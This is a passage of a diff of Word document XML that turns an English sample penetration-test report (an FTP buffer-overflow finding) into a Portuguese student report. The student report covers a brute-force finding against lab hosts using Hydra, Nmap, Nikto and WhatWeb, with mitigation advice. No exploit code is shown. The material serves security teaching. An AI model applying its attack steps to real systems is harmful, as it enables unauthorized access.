+              <w:t>192.168.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t>236.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t>130</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2316,7 +3115,13 @@
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t xml:space="preserve"> 21,22,25,80,443</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t>80</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2351,7 +3156,13 @@
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t>192.168.1.2</w:t>
+              <w:t>192.168.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t>13.128</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2387,99 +3198,19 @@
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t xml:space="preserve"> 22,55,90,8080,80</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="947"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4727" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t>192.168.1.3</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4727" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
-            </w:tcBorders>
-            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
-            <w:tcMar>
-              <w:top w:w="80" w:type="dxa"/>
-              <w:left w:w="80" w:type="dxa"/>
-              <w:bottom w:w="80" w:type="dxa"/>
-              <w:right w:w="80" w:type="dxa"/>
-            </w:tcMar>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>TCP:</w:t>
+              <w:t>80</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t xml:space="preserve"> 1433,3389 </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t xml:space="preserve">UDP: </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>1434,161</w:t>
+              <w:t>, 21</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2520,9 +3251,20 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>3.3 Sample Report – Penetration</w:t>
+        <w:t>3.3</w:t>
       </w:r>
       <w:bookmarkEnd w:id="9"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Pentest</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2530,20 +3272,203 @@
         <w:spacing w:line="288" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
         </w:rPr>
-        <w:t>The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, John was able to successfully gain access to 10 out of the 50 systems.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>Durante o teste, os alunos conseguiram achar algumas vulnerabilidades</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>, com ajuda da</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ferramenta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Nmap</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>, Nikto e WhatWeb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para mapeamento do Sistema</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1546ACB1" wp14:editId="1CC37FCD">
+            <wp:extent cx="2737338" cy="1400777"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
+            <wp:docPr id="1767507372" name="Imagem 5"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 5"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2782088" cy="1423677"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="415DC801" wp14:editId="27AD5F78">
+            <wp:extent cx="2749062" cy="1742160"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1305149653" name="Imagem 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 7"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2763922" cy="1751577"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
           <w:color w:val="000000"/>
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
@@ -2558,10 +3483,101 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F34CD3C" wp14:editId="25ACD026">
+            <wp:extent cx="2965620" cy="1711569"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="3175"/>
+            <wp:docPr id="284833871" name="Imagem 1" descr="Texto&#10;&#10;Descrição gerada automaticamente"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="284833871" name="Imagem 1" descr="Texto&#10;&#10;Descrição gerada automaticamente"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2991380" cy="1726436"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2802F8A8" wp14:editId="0653D0B6">
+            <wp:extent cx="2854570" cy="1822839"/>
+            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
+            <wp:docPr id="480019615" name="Imagem 1" descr="Texto&#10;&#10;Descrição gerada automaticamente"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="480019615" name="Imagem 1" descr="Texto&#10;&#10;Descrição gerada automaticamente"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId14"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2877132" cy="1837246"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:u w:color="000000"/>
+          <w:lang w:eastAsia="en-ZA"/>
+          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:miter w14:lim="400000"/>
+          </w14:textOutline>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -2612,8 +3628,7 @@
               <w:spacing w:line="360" w:lineRule="auto"/>
               <w:jc w:val="both"/>
               <w:rPr>
-                <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-                <w:color w:val="4F81BD"/>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:hint="eastAsia"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
                 <w:u w:color="4F81BD"/>
@@ -2622,9 +3637,17 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:b/>
+                <w:bCs/>
               </w:rPr>
               <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">Vulnerability Exploited:  </w:t>
+              <w:t>Vulnerabilidade</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+              </w:rPr>
+              <w:t xml:space="preserve">:  </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2633,7 +3656,16 @@
                 <w:szCs w:val="24"/>
                 <w:u w:color="4F81BD"/>
               </w:rPr>
-              <w:t>Ability Server 2.34 FTP STOR Buffer Overflow</w:t>
+              <w:t>B</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:u w:color="4F81BD"/>
+              </w:rPr>
+              <w:t>rute Force</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2648,14 +3680,44 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t xml:space="preserve">System Vulnerable: </w:t>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>IP</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>’s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> do Sistema</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+              </w:rPr>
+              <w:t xml:space="preserve">: </w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t>172.16.203.134</w:t>
+              <w:t>192.168.236.130</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> e 192.168.13.128</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2670,28 +3732,52 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Vulnerability Explanation</w:t>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Explicação</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t xml:space="preserve">: Ability Server 2.34 is subject to a buffer overflow vulnerability in STOR field. Attackers can use this vulnerability to cause arbitrary remote code execution and take completely control over the system. When performing the penetration test, John noticed an outdated version of Ability Server running from the service enumeration phase. In addition, the operating system was different from the known public exploit. A rewritten exploit was needed </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">: </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t>in order for</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>Um ataque de força bruta é uma técnica para obter acesso não autorizado a</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
               </w:rPr>
-              <w:t xml:space="preserve"> successful code execution to occur. Once the exploit was rewritten, a targeted attack was performed on the system which gave John full administrative access over the system.</w:t>
+              <w:t>os</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> sistemas através da tentativa sistemática de adivinhar credenciais de usuário. Os ataques de força bruta envolvem o uso de programas automatizados que testam diversas combinações de nomes de usuário e senhas em alta velocidade até encontrar as corretas.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Nesse teste</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t>, foram utilizadas ferramentas como Hydra</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> para o Brute Force.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2707,24 +3793,85 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t>Vulnerability Fix</w:t>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Mitigação</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t xml:space="preserve">: The publishers of the Ability Server have issued a patch to fix this known issue. It can be found here: </w:t>
-            </w:r>
-            <w:hyperlink r:id="rId8" w:history="1">
-              <w:r>
-                <w:rPr>
-                  <w:rStyle w:val="Hyperlink0"/>
-                  <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-                </w:rPr>
-                <w:t>http://www.code-crafters.com/abilityserver/</w:t>
-              </w:r>
-            </w:hyperlink>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t>P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t>ara</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> a</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> mitigação de Força Bruta, ideias como limitação de tentativas de login, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t>monitoramento de logins suspeitos</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> em tempo real</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t>, atualizações regulares</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> e bloqueio temporário após tentativas mal sucedidas</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -2740,17 +3887,35 @@
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Severity: </w:t>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Ameaça</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-                <w:color w:val="FF0000"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="None"/>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="None"/>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:color w:val="FFC000"/>
                 <w:u w:color="FF0000"/>
               </w:rPr>
-              <w:t>Critical</w:t>
+              <w:t>Média</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2767,2389 +3932,26 @@
               <w:rPr>
                 <w:rStyle w:val="None"/>
                 <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Proof of Concept Code Here:  </w:t>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Prints</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-              </w:rPr>
-              <w:t>Modifications to the existing exploit was needed and is highlighted in red.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
+                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>:</w:t>
+            </w:r>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
